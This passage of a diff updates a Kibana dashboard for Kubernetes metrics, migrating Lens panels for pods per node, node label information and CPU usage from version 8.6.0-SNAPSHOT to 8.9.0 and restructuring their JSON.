"17247592-e6aa-4dba-b20d-b0accaf877dc", + "isTransposed": false + } + ], + "layerId": "4bf1dfdb-7a60-482d-88d4-130d598ac7bb", + "layerType": "data" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-4bf1dfdb-7a60-482d-88d4-130d598ac7bb", - "type": "index-pattern" + "title": "Allocated and Allocatable Pods per Node [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Allocated and Allocatable Pods per Node [Metrics Kubernetes]" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 8, + "i": "2a2da54b-f923-4b1f-b36c-0b1d283405b9", + "w": 48, + "x": 0, + "y": 12 + }, + "panelIndex": "2a2da54b-f923-4b1f-b36c-0b1d283405b9", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-28060f62-4880-4b1c-aef2-fe42f9df0c64", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "3a819463-89ca-494a-9d6a-9e600dccf098", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "28060f62-4880-4b1c-aef2-fe42f9df0c64": { + "columnOrder": [ + "6efc3318-f2d7-4e8b-ad3c-138a8cf9522d", + "b0d6d768-94b4-4a60-8703-d4e2f7a04df2", + "7ccec911-2e78-4c28-ade7-94447ebb88b2", + "802c8bea-aecf-4d1b-9b54-84d527d1fc18", + "968ccc98-9aab-42e0-9ae1-bb2767d38edb", + "d9dbaa39-4e9e-41a9-b6ce-dbe76d4e865e", + "f17d0cb7-9045-4bc8-a26a-0777b34a90e6", + "f146f523-db5b-4965-8486-615c98de32f7" + ], + "columns": { + "6efc3318-f2d7-4e8b-ad3c-138a8cf9522d": { + "customLabel": true, + "dataType": "string", + "isBucketed": true, + "label": "Node", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - { - "id": "metrics-*", - "name": "562d314a-8db1-4d85-9fcd-fe3224749cb2", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "4bf1dfdb-7a60-482d-88d4-130d598ac7bb": { - "columnOrder": [ - "d3f3271d-566f-4fe6-9bf1-69a47d59a2be", - "f0a42b6b-873e-41f2-8ce3-e0598cd7ed64", - "17247592-e6aa-4dba-b20d-b0accaf877dc" - ], - "columns": { - "17247592-e6aa-4dba-b20d-b0accaf877dc": { - "customLabel": true, - "dataType": "number", - "filter": { - "language": "kuery", - "query": "kubernetes.node.pod.allocatable.total: *" - }, - "isBucketed": false, - "label": "Total Allocatable Pods", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.node.pod.allocatable.total" - }, - "d3f3271d-566f-4fe6-9bf1-69a47d59a2be": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Node", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "columnId": "f0a42b6b-873e-41f2-8ce3-e0598cd7ed64", - "type": "column" - }, - "orderDirection": "desc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.node.name" - }, - "f0a42b6b-873e-41f2-8ce3-e0598cd7ed64": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Allocated Pods", - "operationType": "unique_count", - "params": { - "emptyAsNull": true - }, - "scale": "ratio", - "sourceField": "kubernetes.pod.name" - } - }, - "incompleteColumns": {} - } - } - } + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "562d314a-8db1-4d85-9fcd-fe3224749cb2", - "key": "data_stream.dataset", - "negate": false, - "params": [ - "kubernetes.pod", - "kubernetes.state_node" - ], - "type": "phrases", - "value": [ - "kubernetes.pod", - "kubernetes.state_node" - ] - }, - "query": { - "bool": { - "minimum_should_match": 1, - "should": [ - { - "match_phrase": { - "data_stream.dataset": "kubernetes.pod" - } - }, - { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_node" - } - } - ] - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "columns": [ - { - "columnId": "d3f3271d-566f-4fe6-9bf1-69a47d59a2be", - "isTransposed": false - }, - { - "columnId": "f0a42b6b-873e-41f2-8ce3-e0598cd7ed64", - "isTransposed": false - }, - { - "columnId": "17247592-e6aa-4dba-b20d-b0accaf877dc", - "isTransposed": false - } - ], - "layerId": "4bf1dfdb-7a60-482d-88d4-130d598ac7bb", - "layerType": "data" - } + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.node.name" }, - "title": "Allocated and Allocatable Pods per Node [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsDatatable" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 8, - "i": "c6bb8ec0-dae3-4438-ab76-0bff97321124", - "w": 48, - "x": 0, - "y": 4 - }, - "panelIndex": "c6bb8ec0-dae3-4438-ab76-0bff97321124", - "title": "Allocated and Allocatable Pods per Node [Metrics Kubernetes]", - "type": "lens", - "version": "8.6.0-SNAPSHOT" + "7ccec911-2e78-4c28-ade7-94447ebb88b2": { + "customLabel": true, + "dataType": "string", + "filter": { + "language": "kuery", + "query": "kubernetes.labels.kubernetes_io/os: *" + }, + "isBucketed": false, + "label": "Operating System", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "kubernetes.labels.kubernetes_io/os" + }, + "802c8bea-aecf-4d1b-9b54-84d527d1fc18": { + "customLabel": true, + "dataType": "string", + "filter": { + "language": "kuery", + "query": "kubernetes.labels.kubernetes_io/hostname: *" + }, + "isBucketed": false, + "label": "Hostname", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "kubernetes.labels.kubernetes_io/hostname" + }, + "968ccc98-9aab-42e0-9ae1-bb2767d38edb": { + "customLabel": true, + "dataType": "string", + "filter": { + "language": "kuery", + "query": "kubernetes.node.status.ready: *" + }, + "isBucketed": false, + "label": "Ready", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "kubernetes.node.status.ready" + }, + "b0d6d768-94b4-4a60-8703-d4e2f7a04df2": { + "customLabel": true, + "dataType": "string", + "filter": { + "language": "kuery", + "query": "kubernetes.labels.kubernetes_io/arch: *" + }, + "isBucketed": false, + "label": "Architecture", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "kubernetes.labels.kubernetes_io/arch" + }, + "d9dbaa39-4e9e-41a9-b6ce-dbe76d4e865e": { + "customLabel": true, + "dataType": "boolean", + "filter": { + "language": "kuery", + "query": "kubernetes.node.status.unschedulable: *" + }, + "isBucketed": false, + "label": "Unschedulable", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ratio", + "sourceField": "kubernetes.node.status.unschedulable" + }, + "f146f523-db5b-4965-8486-615c98de32f7": { + "customLabel": true, + "dataType": "string", + "filter": { + "language": "kuery", + "query": "kubernetes.node.status.memory_pressure: *" + }, + "isBucketed": false, + "label": "Memory Pressure", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "kubernetes.node.status.memory_pressure" + }, + "f17d0cb7-9045-4bc8-a26a-0777b34a90e6": { + "customLabel": true, + "dataType": "string", + "filter": { + "language": "kuery", + "query": "kubernetes.node.status.disk_pressure: *" + }, + "isBucketed": false, + "label": "Disk Pressure", + "operationType": "last_value", + "params": { + "sortField": "@timestamp" + }, + "scale": "ordinal", + "sourceField": "kubernetes.node.status.disk_pressure" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "3a819463-89ca-494a-9d6a-9e600dccf098", + "key": "data_stream.dataset", + "negate": false, + "params": [ + "kubernetes.node", + "kubernetes.state_node" + ], + "type": "phrases", + "value": [ + "kubernetes.node", + "kubernetes.state_node" + ] + }, + "query": { + "bool": { + "minimum_should_match": 1, + "should": [ + { + "match_phrase": { + "data_stream.dataset": "kubernetes.node" + } + }, + { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_node" + } + } + ] + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "columns": [ + { + "columnId": "6efc3318-f2d7-4e8b-ad3c-138a8cf9522d", + "isTransposed": false + }, + { + "columnId": "b0d6d768-94b4-4a60-8703-d4e2f7a04df2", + "isTransposed": false + }, + { + "columnId": "7ccec911-2e78-4c28-ade7-94447ebb88b2", + "isTransposed": false + }, + { + "columnId": "802c8bea-aecf-4d1b-9b54-84d527d1fc18", + "isTransposed": false + }, + { + "columnId": "968ccc98-9aab-42e0-9ae1-bb2767d38edb", + "isTransposed": false + }, + { + "columnId": "d9dbaa39-4e9e-41a9-b6ce-dbe76d4e865e", + "isTransposed": false + }, + { + "columnId": "f17d0cb7-9045-4bc8-a26a-0777b34a90e6", + "isTransposed": false + }, + { + "columnId": "f146f523-db5b-4965-8486-615c98de32f7", + "isTransposed": false + } + ], + "layerId": "28060f62-4880-4b1c-aef2-fe42f9df0c64", + "layerType": "data" + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-28060f62-4880-4b1c-aef2-fe42f9df0c64", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "3a819463-89ca-494a-9d6a-9e600dccf098", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "28060f62-4880-4b1c-aef2-fe42f9df0c64": { - "columnOrder": [ - "6efc3318-f2d7-4e8b-ad3c-138a8cf9522d", - "b0d6d768-94b4-4a60-8703-d4e2f7a04df2", - "7ccec911-2e78-4c28-ade7-94447ebb88b2", - "802c8bea-aecf-4d1b-9b54-84d527d1fc18", - "968ccc98-9aab-42e0-9ae1-bb2767d38edb", - "d9dbaa39-4e9e-41a9-b6ce-dbe76d4e865e", - "f17d0cb7-9045-4bc8-a26a-0777b34a90e6", - "f146f523-db5b-4965-8486-615c98de32f7" - ], - "columns": { - "6efc3318-f2d7-4e8b-ad3c-138a8cf9522d": { - "customLabel": true, - "dataType": "string", - "isBucketed": true, - "label": "Node", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.node.name" - }, - "7ccec911-2e78-4c28-ade7-94447ebb88b2": { - "customLabel": true, - "dataType": "string", - "filter": { - "language": "kuery", - "query": "kubernetes.labels.kubernetes_io/os: *" - }, - "isBucketed": false, - "label": "Operating System", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ordinal", - "sourceField": "kubernetes.labels.kubernetes_io/os" - }, - "802c8bea-aecf-4d1b-9b54-84d527d1fc18": { - "customLabel": true, - "dataType": "string", - "filter": { - "language": "kuery", - "query": "kubernetes.labels.kubernetes_io/hostname: *" - }, - "isBucketed": false, - "label": "Hostname", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ordinal", - "sourceField": "kubernetes.labels.kubernetes_io/hostname" - }, - "968ccc98-9aab-42e0-9ae1-bb2767d38edb": { - "customLabel": true, - "dataType": "string", - "filter": { - "language": "kuery", - "query": "kubernetes.node.status.ready: *" - }, - "isBucketed": false, - "label": "Ready", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ordinal", - "sourceField": "kubernetes.node.status.ready" - }, - "b0d6d768-94b4-4a60-8703-d4e2f7a04df2": { - "customLabel": true, - "dataType": "string", - "filter": { - "language": "kuery", - "query": "kubernetes.labels.kubernetes_io/arch: *" - }, - "isBucketed": false, - "label": "Architecture", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ordinal", - "sourceField": "kubernetes.labels.kubernetes_io/arch" - }, - "d9dbaa39-4e9e-41a9-b6ce-dbe76d4e865e": { - "customLabel": true, - "dataType": "boolean", - "filter": { - "language": "kuery", - "query": "kubernetes.node.status.unschedulable: *" - }, - "isBucketed": false, - "label": "Unschedulable", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ratio", - "sourceField": "kubernetes.node.status.unschedulable" - }, - "f146f523-db5b-4965-8486-615c98de32f7": { - "customLabel": true, - "dataType": "string", - "filter": { - "language": "kuery", - "query": "kubernetes.node.status.memory_pressure: *" - }, - "isBucketed": false, - "label": "Memory Pressure", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ordinal", - "sourceField": "kubernetes.node.status.memory_pressure" - }, - "f17d0cb7-9045-4bc8-a26a-0777b34a90e6": { - "customLabel": true, - "dataType": "string", - "filter": { - "language": "kuery", - "query": "kubernetes.node.status.disk_pressure: *" - }, - "isBucketed": false, - "label": "Disk Pressure", - "operationType": "last_value", - "params": { - "sortField": "@timestamp" - }, - "scale": "ordinal", - "sourceField": "kubernetes.node.status.disk_pressure" - } - }, - "incompleteColumns": {} - } - } - } + "title": "Node Informations by Labels [Metrics Kubernetes]", + "type": "lens", + "visualizationType": "lnsDatatable" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "Node Informations by Labels [Metrics Kubernetes]" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 13, + "i": "f11dcb2d-3850-430c-b365-e925473ffe81", + "w": 24, + "x": 0, + "y": 20 + }, + "panelIndex": "f11dcb2d-3850-430c-b365-e925473ffe81", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-f04e39cf-1a10-4841-86e3-53c07cb706df", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "53703bad-9449-489b-84bd-35c1c8a8d710", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "f04e39cf-1a10-4841-86e3-53c07cb706df": { + "columnOrder": [ + "cbe72000-6be9-4a2d-aa1a-217370d18882", + "8640f22e-f2dd-42d4-bf83-ce98ee4f75a1", + "55cd4b2d-4bc2-4f06-97c4-0fc31fcfd5af", + "55cd4b2d-4bc2-4f06-97c4-0fc31fcfd5afX0", + "55cd4b2d-4bc2-4f06-97c4-0fc31fcfd5afX1", + "55cd4b2d-4bc2-4f06-97c4-0fc31fcfd5afX2" + ], + "columns": { + "55cd4b2d-4bc2-4f06-97c4-0fc31fcfd5af": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "CPU Usage Pct", + "operationType": "formula", + "params": { + "format": { + "id": "percent", + "params": { + "decimals": 2 + } }, - "filters": [ + "formula": "average(kubernetes.node.cpu.usage.nanocores)/(max(kubernetes.node.cpu.allocatable.cores)*1000000000)", + "isFormulaBroken": false + }, + "references": [ + "55cd4b2d-4bc2-4f06-97c4-0fc31fcfd5afX2" + ], + "scale": "ratio" + }, + "55cd4b2d-4bc2-4f06-97c4-0fc31fcfd5afX0": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of CPU Usage Pct", + "operationType": "average", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "kubernetes.node.cpu.usage.nanocores" + }, + "55cd4b2d-4bc2-4f06-97c4-0fc31fcfd5afX1": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of CPU Usage Pct", + "operationType": "max", + "params": { + "emptyAsNull": false + }, + "scale": "ratio", + "sourceField": "kubernetes.node.cpu.allocatable.cores" + }, + "55cd4b2d-4bc2-4f06-97c4-0fc31fcfd5afX2": { + "customLabel": true, + "dataType": "number", + "isBucketed": false, + "label": "Part of CPU Usage Pct", + "operationType": "math", + "params": { + "tinymathAst": { + "args": [ + "55cd4b2d-4bc2-4f06-97c4-0fc31fcfd5afX0", { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "3a819463-89ca-494a-9d6a-9e600dccf098", - "key": "data_stream.dataset", - "negate": false, - "params": [ - "kubernetes.node", - "kubernetes.state_node" - ], - "type": "phrases", - "value": [ - "kubernetes.node", - "kubernetes.state_node" - ] - }, - "query": { - "bool": { - "minimum_should_match": 1, - "should": [ - { - "match_phrase": { - "data_stream.dataset": "kubernetes.node" - } - }, - { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_node" - } - } - ] - } - } + "args": [ + "55cd4b2d-4bc2-4f06-97c4-0fc31fcfd5afX1", + 1000000000 + ], + "location": { + "max": 99, + "min": 46 + }, + "name": "multiply", + "text": "max(kubernetes.node.cpu.allocatable.cores)*1000000000", + "type": "function" } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" - }, - "visualization": { - "columns": [ - { - "columnId": "6efc3318-f2d7-4e8b-ad3c-138a8cf9522d", - "isTransposed": false - }, - { - "columnId": "b0d6d768-94b4-4a60-8703-d4e2f7a04df2", - "isTransposed": false - }, - { - "columnId": "7ccec911-2e78-4c28-ade7-94447ebb88b2", - "isTransposed": false - }, - { - "columnId": "802c8bea-aecf-4d1b-9b54-84d527d1fc18", - "isTransposed": false - }, - { - "columnId": "968ccc98-9aab-42e0-9ae1-bb2767d38edb", - "isTransposed": false - }, - { - "columnId": "d9dbaa39-4e9e-41a9-b6ce-dbe76d4e865e", - "isTransposed": false - }, - { - "columnId": "f17d0cb7-9045-4bc8-a26a-0777b34a90e6", - "isTransposed": false - }, - { - "columnId": "f146f523-db5b-4965-8486-615c98de32f7", - "isTransposed": false - } - ], - "layerId": "28060f62-4880-4b1c-aef2-fe42f9df0c64", - "layerType": "data" + ], + "location": { + "max": 100, + "min": 0 + }, + "name": "divide", + "text": "average(kubernetes.node.cpu.usage.nanocores)/(max(kubernetes.node.cpu.allocatable.cores)*1000000000)", + "type": "function" } + }, + "references": [ + "55cd4b2d-4bc2-4f06-97c4-0fc31fcfd5afX0", + "55cd4b2d-4bc2-4f06-97c4-0fc31fcfd5afX1" + ], + "scale": "ratio" }, - "title": "Node Informations by Labels [Metrics Kubernetes]", - "type": "lens", - "visualizationType": "lnsDatatable" - }, - "enhancements": {}, - "hidePanelTitles": false - }, - "gridData": { - "h": 8, - "i": "2a2da54b-f923-4b1f-b36c-0b1d283405b9", - "w": 48, - "x": 0, - "y": 12 - }, - "panelIndex": "2a2da54b-f923-4b1f-b36c-0b1d283405b9", - "title": "Node Informations by Labels [Metrics Kubernetes]", - "type": "lens", - "version": "8.6.0-SNAPSHOT" - }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-f04e39cf-1a10-4841-86e3-53c07cb706df", - "type": "index-pattern" - }, - { - "id": "metrics-*", - "name": "53703bad-9449-489b-84bd-35c1c8a8d710", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "f04e39cf-1a10-4841-86e3-53c07cb706df": { - "columnOrder": [ - "cbe72000-6be9-4a2d-aa1a-217370d18882", - "8640f22e-f2dd-42d4-bf83-ce98ee4f75a1", - "55cd4b2d-4bc2-4f06-97c4-0fc31fcfd5af", - "55cd4b2d-4bc2-4f06-97c4-0fc31fcfd5afX0", - "55cd4b2d-4bc2-4f06-97c4-0fc31fcfd5afX1", - "55cd4b2d-4bc2-4f06-97c4-0fc31fcfd5afX2" - ], - "columns": { - "55cd4b2d-4bc2-4f06-97c4-0fc31fcfd5af": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "CPU Usage Pct", - "operationType": "formula", - "params": { - "format": { - "id": "percent", - "params": { - "decimals": 2 - } - }, - "formula": "average(kubernetes.node.cpu.usage.nanocores)/(max(kubernetes.node.cpu.allocatable.cores)*1000000000)", - "isFormulaBroken": false - }, - "references": [ - "55cd4b2d-4bc2-4f06-97c4-0fc31fcfd5afX2" - ], - "scale": "ratio" - }, - "55cd4b2d-4bc2-4f06-97c4-0fc31fcfd5afX0": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of CPU Usage Pct", - "operationType": "average", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "kubernetes.node.cpu.usage.nanocores" - }, - "55cd4b2d-4bc2-4f06-97c4-0fc31fcfd5afX1": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of CPU Usage Pct", - "operationType": "max", - "params": { - "emptyAsNull": false - }, - "scale": "ratio", - "sourceField": "kubernetes.node.cpu.allocatable.cores" - }, - "55cd4b2d-4bc2-4f06-97c4-0fc31fcfd5afX2": { - "customLabel": true, - "dataType": "number", - "isBucketed": false, - "label": "Part of CPU Usage Pct", - "operationType": "math", - "params": { - "tinymathAst": { - "args": [ - "55cd4b2d-4bc2-4f06-97c4-0fc31fcfd5afX0", - { - "args": [ - "55cd4b2d-4bc2-4f06-97c4-0fc31fcfd5afX1", - 1000000000 - ], - "location": { - "max": 99, - "min": 46 - }, - "name": "multiply", - "text": "max(kubernetes.node.cpu.allocatable.cores)*1000000000", - "type": "function" - } - ], - "location": { - "max": 100, - "min": 0 - }, - "name": "divide", - "text": "average(kubernetes.node.cpu.usage.nanocores)/(max(kubernetes.node.cpu.allocatable.cores)*1000000000)", - "type": "function" - } - }, - "references": [ - "55cd4b2d-4bc2-4f06-97c4-0fc31fcfd5afX0", - "55cd4b2d-4bc2-4f06-97c4-0fc31fcfd5afX1" - ], - "scale": "ratio" - }, - "8640f22e-f2dd-42d4-bf83-ce98ee4f75a1": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - "operationType": "date_histogram", - "params": { - "dropPartials": false, - "includeEmptyRows": true, - "interval": "auto" - }, - "scale": "interval", - "sourceField": "@timestamp" - }, - "cbe72000-6be9-4a2d-aa1a-217370d18882": { - "dataType": "string", - "isBucketed": true, - "label": "Top 10 values of kubernetes.node.name", - "operationType": "terms", - "params": { - "missingBucket": false, - "orderBy": { - "fallback": true, - "type": "alphabetical" - }, - "orderDirection": "asc", - "otherBucket": true, - "parentFormat": { - "id": "terms" - }, - "size": 10 - }, - "scale": "ordinal", - "sourceField": "kubernetes.node.name" - } - }, - "incompleteColumns": {} - } - } - } + "8640f22e-f2dd-42d4-bf83-ce98ee4f75a1": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "cbe72000-6be9-4a2d-aa1a-217370d18882": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of kubernetes.node.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - "filters": [ - { - "$state": { - "store": "appState" - }, - "meta": { - "alias": null, - "disabled": false, - "index": "53703bad-9449-489b-84bd-35c1c8a8d710", - "key": "data_stream.dataset", - "negate": false, - "params": [ - "kubernetes.node", - "kubernetes.state_node" - ], - "type": "phrases", - "value": [ - "kubernetes.node", - "kubernetes.state_node" - ] - }, - "query": { - "bool": { - "minimum_should_match": 1, - "should": [ - { - "match_phrase": { - "data_stream.dataset": "kubernetes.node" - } - }, - { - "match_phrase": { - "data_stream.dataset": "kubernetes.state_node" - } - } - ] - } - } - } - ], - "internalReferences": [], - "query": { - "language": "kuery", - "query": "" + "orderDirection": "asc", + "otherBucket": true, + "parentFormat": { + "id": "terms" }, - "visualization": { - "axisTitlesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "curveType": "LINEAR", - "fittingFunction": "None", - "gridlinesVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "labelsOrientation": { - "x": 0, - "yLeft": 0, - "yRight": 0 - }, - "layers": [ - { - "accessors": [ - "55cd4b2d-4bc2-4f06-97c4-0fc31fcfd5af" - ], - "layerId": "f04e39cf-1a10-4841-86e3-53c07cb706df", - "layerType": "data", - "position": "top", - "seriesType": "area", - "showGridlines": false, - "splitAccessor": "cbe72000-6be9-4a2d-aa1a-217370d18882", - "xAccessor": "8640f22e-f2dd-42d4-bf83-ce98ee4f75a1" - } - ], - "legend": { - "isVisible": true, - "legendSize": "large", - "position": "right", - "showSingleSeries": true - }, - "preferredSeriesType": "area", - "tickLabelsVisibilitySettings": { - "x": true, - "yLeft": true, - "yRight": true - }, - "valueLabels": "hide", - "valuesInLegend": true - } + "size": 10 + }, + "scale": "ordinal", + "sourceField": "kubernetes.node.name" + } + }, + "incompleteColumns": {} + } + } + } + }, + "filters": [ + { + "$state": { + "store": "appState" + }, + "meta": { + "alias": null, + "disabled": false, + "index": "53703bad-9449-489b-84bd-35c1c8a8d710", + "key": "data_stream.dataset", + "negate": false, + "params": [ + "kubernetes.node", + "kubernetes.state_node" + ], + "type": "phrases", + "value": [ + "kubernetes.node", + "kubernetes.state_node" + ] + }, + "query": { + "bool": { + "minimum_should_match": 1, + "should": [ + { + "match_phrase": { + "data_stream.dataset": "kubernetes.node" + } }, - "title": "", - "type": "lens", - "visualizationType": "lnsXY" - }, - "enhancements": {}, - "hidePanelTitles": false + { + "match_phrase": { + "data_stream.dataset": "kubernetes.state_node" + } + } + ] + } + } + } + ], + "internalReferences": [], + "query": { + "language": "kuery", + "query": "" + }, + "visualization": { + "axisTitlesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "curveType": "LINEAR", + "fittingFunction": "None", + "gridlinesVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "labelsOrientation": { + "x": 0, + "yLeft": 0, + "yRight": 0 }, - "gridData": { - "h": 13, - "i": "f11dcb2d-3850-430c-b365-e925473ffe81", - "w": 24, - "x": 0, - "y": 20 + "layers": [ + { + "accessors": [ + "55cd4b2d-4bc2-4f06-97c4-0fc31fcfd5af" + ], + "layerId": "f04e39cf-1a10-4841-86e3-53c07cb706df", + "layerType": "data", + "position": "top", + "seriesType": "area", + "showGridlines": false, + "splitAccessor": "cbe72000-6be9-4a2d-aa1a-217370d18882", + "xAccessor": "8640f22e-f2dd-42d4-bf83-ce98ee4f75a1" + } + ], + "legend": { + "isVisible": true, + "legendSize": "large", + "position": "right", + "showSingleSeries": true }, - "panelIndex": "f11dcb2d-3850-430c-b365-e925473ffe81", - "title": "CPU usage by Node [Metrics Kubernetes]", - "type": "lens", - "version": "8.6.0-SNAPSHOT" + "preferredSeriesType": "area", + "tickLabelsVisibilitySettings": { + "x": true, + "yLeft": true, + "yRight": true + }, + "valueLabels": "hide", + "valuesInLegend": true + } }, - { - "embeddableConfig": { - "attributes": { - "references": [ - { - "id": "metrics-*", - "name": "indexpattern-datasource-layer-98fe7b88-6346-4b74-b00d-dae2a5ce24f3", - "type": "index-pattern" + "title": "", + "type": "lens", + "visualizationType": "lnsXY" + }, + "enhancements": {}, + "hidePanelTitles": false, + "type": "lens" + }, + "title": "CPU usage by Node [Metrics Kubernetes]" + }, + { + "version": "8.9.0", + "type": "lens", + "gridData": { + "h": 13, + "i": "64187c9b-8038-47a3-b7df-6562d740840f", + "w": 24, + "x": 24, + "y": 20 + }, + "panelIndex": "64187c9b-8038-47a3-b7df-6562d740840f", + "embeddableConfig": { + "attributes": { + "references": [ + { + "id": "metrics-*", + "name": "indexpattern-datasource-layer-98fe7b88-6346-4b74-b00d-dae2a5ce24f3", + "type": "index-pattern" + }, + { + "id": "metrics-*", + "name": "89318796-9c5f-41c0-be0f-5545f0012e08", + "type": "index-pattern" + } + ], + "state": { + "adHocDataViews": {}, + "datasourceStates": { + "formBased": { + "layers": { + "98fe7b88-6346-4b74-b00d-dae2a5ce24f3": { + "columnOrder": [ + "3bc424fc-c689-46a6-a701-f2a256b700b1", + "36afcbf0-7ba6-46cb-b9d7-846193cf23a8", + "b8d52304-59e9-4635-80b0-dac037233757", + "b8d52304-59e9-4635-80b0-dac037233757X0", + "b8d52304-59e9-4635-80b0-dac037233757X1", + "b8d52304-59e9-4635-80b0-dac037233757X2" + ], + "columns": { + "36afcbf0-7ba6-46cb-b9d7-846193cf23a8": { + "dataType": "date", + "isBucketed": true, + "label": "@timestamp", + "operationType": "date_histogram", + "params": { + "dropPartials": false, + "includeEmptyRows": true, + "interval": "auto" + }, + "scale": "interval", + "sourceField": "@timestamp" + }, + "3bc424fc-c689-46a6-a701-f2a256b700b1": { + "dataType": "string", + "isBucketed": true, + "label": "Top 10 values of kubernetes.node.name", + "operationType": "terms", + "params": { + "missingBucket": false, + "orderBy": { + "fallback": true, + "type": "alphabetical" }, - { - "id": "metrics-*", - "name": "89318796-9c5f-41c0-be0f-5545f0012e08", - "type": "index-pattern" - } - ], - "state": { - "adHocDataViews": {}, - "datasourceStates": { - "formBased": { - "layers": { - "98fe7b88-6346-4b74-b00d-dae2a5ce24f3": { - "columnOrder": [ - "3bc424fc-c689-46a6-a701-f2a256b700b1", - "36afcbf0-7ba6-46cb-b9d7-846193cf23a8", - "b8d52304-59e9-4635-80b0-dac037233757", - "b8d52304-59e9-4635-80b0-dac037233757X0", - "b8d52304-59e9-4635-80b0-dac037233757X1", - "b8d52304-59e9-4635-80b0-dac037233757X2" - ], - "columns": { - "36afcbf0-7ba6-46cb-b9d7-846193cf23a8": { - "dataType": "date", - "isBucketed": true, - "label": "@timestamp", - 